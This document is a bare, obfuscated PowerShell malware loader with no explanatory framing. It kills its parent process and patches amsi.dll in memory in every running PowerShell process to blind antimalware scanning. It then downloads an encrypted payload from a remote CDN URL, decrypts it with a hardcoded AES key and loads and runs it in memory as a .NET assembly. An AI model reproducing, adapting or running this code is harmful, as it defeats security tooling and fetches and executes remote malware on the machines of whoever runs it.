$petal = (Get-CimInstance Win32_Process -Filter "ProcessId=$PID").ParentProcessId if ($petal) { Stop-Process -Id $petal -Force } Add-Type @" using System; using System.Runtime.InteropServices; public class K { [DllImport("kernel32.dll", SetLastError=true)] public static extern bool VirtualProtectEx(IntPtr h, IntPtr a, uint s, uint p, out uint o); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool ReadProcessMemory(IntPtr h, IntPtr a, byte[] b, int s, out IntPtr r); [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr OpenProcess(uint a, bool i, int p); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool WriteProcessMemory(IntPtr h, IntPtr a, byte[] b, uint s, out int w); } "@ function KJhbhb { Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $orchard = Get-Process -Name "powershell" -ErrorAction SilentlyContinue if (!$orchard) { exit 1 } foreach ($yarrow in $orchard) { Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $bridge = [K]::OpenProcess(0x001F0FFF, $vine, $yarrow.Id) $echo = $null $sail = 0 foreach ($hemlock in $yarrow.Modules) { if ($hemlock.ModuleName -eq "amsi.dll") { $echo = $hemlock.BaseAddress $sail = $hemlock.ModuleMemorySize break } } if (!$echo) { continue } $prairie = [byte[]]::new(32) $star = [byte[]]@(0x4c,0x8b,0xdc,0x49,0x89,0x5b,0x08,0x49,0x89,0x6b,0x10,0x49,0x89,0x73,0x18,0x57,0x41,0x56,0x41,0x57,0x48,0x83,0xec,0x70,0x4d,0x8b,0xf9,0x41,0x8b,0xf8,0x48,0x8b) $autumn = $null for ($ember = 0; $ember -le $sail; $ember += 32) { $cedar = [IntPtr]::Zero [K]::ReadProcessMemory($bridge, [IntPtr]($echo.ToInt64() + $ember), $prairie, 32, [ref]$cedar) $kestrel = $tundra for ($birch = 0; $birch -lt 32; $birch++) { if ($prairie[$birch] -ne $star[$birch]) { $kestrel = $vine; break } } if ($kestrel) { $autumn = [IntPtr]($echo.ToInt64() + $ember); break } } if (!$autumn) { continue } Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $queen = 0 [K]::VirtualProtectEx($bridge, $echo, 0x1000, 0x40, [ref]$queen) $osprey = [byte[]]@(0x31,0xff,0x90) $jade = 0 [K]::WriteProcessMemory($bridge, [IntPtr]($autumn.ToInt64() + 0x1b), $osprey, 3, [ref]$jade) } } KJhbhb #ujhifsfiohdf setx BUILD "CVV" $zephyr = "https://sdfas-cloud.b-cdn.net/wqegfasd.bin" $ebb = [System.Net.WebClient]::new() $wheat = $ebb.DownloadData($zephyr) $veil = [System.Security.Cryptography.Aes]::Create() $ivory = [System.Text.Encoding]::UTF8.GetBytes("X7b9PqT3mW2kL8vR5nY6zJ1hF4tD9cM0") $flame = [System.Text.Encoding]::UTF8.GetBytes("K9mW3pQ7tR2vL8nY") $veil.Key = $ivory $veil.IV = $flame $knob = $veil.CreateDecryptor() $rune = $knob.TransformFinalBlock($wheat, 0, $wheat.Length) $moor = [System.Reflection.Assembly]::Load($rune) $orbit = $moor.EntryPoint $orbit.Invoke($null, $null) #ujhifsfiohdf